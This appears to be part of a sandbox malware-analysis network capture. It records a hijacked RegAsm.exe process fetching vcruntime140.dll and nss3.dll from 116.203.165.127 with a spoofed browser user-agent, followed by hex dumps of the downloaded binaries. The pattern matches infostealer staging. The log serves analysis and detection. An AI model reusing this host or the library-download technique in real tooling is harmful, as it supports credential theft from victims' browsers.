2024-09-21 16:51:51 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-21 16:51:51 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49755	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:52 UTC	204	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:52 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:52 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:52 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 16:51:52 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-21 16:51:52 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-21 16:51:52 UTC	16384	IN	Data Raw: 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-21 16:51:52 UTC	16384	IN	Data Raw: d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-21 16:51:52 UTC	15605	IN	Data Raw: 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f Data Ascii: T@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49756	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:53 UTC	196	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:54 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:53 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:53 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 16:51:54 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-21 16:51:54 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
